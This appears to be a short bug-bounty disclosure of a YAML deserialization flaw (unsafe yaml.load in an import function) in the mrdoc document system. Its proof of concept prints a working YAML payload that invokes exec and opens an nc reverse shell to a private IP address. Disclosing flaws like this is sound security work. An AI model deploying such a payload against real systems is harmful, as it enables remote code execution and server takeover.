Deserialization of Untrusted Data in zmister2016/mrdoc
Valid
Reported on
Aug 29th 2021
✍️ Description
online document system developed based on python. It is suitable for individuals and small teams to manage documents, wiki, knowledge and notes. like gitbook this package is vulnerable for RCE due to Yaml.load in import function
🕵️♂️ Proof of Concept

Uploaded ZIp :

Payload.yaml :
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.102 8090 >/tmp/f')"
💥 Impact
This vulnerability is capable of RCE
Occurrences
2 years ago
to join this conversation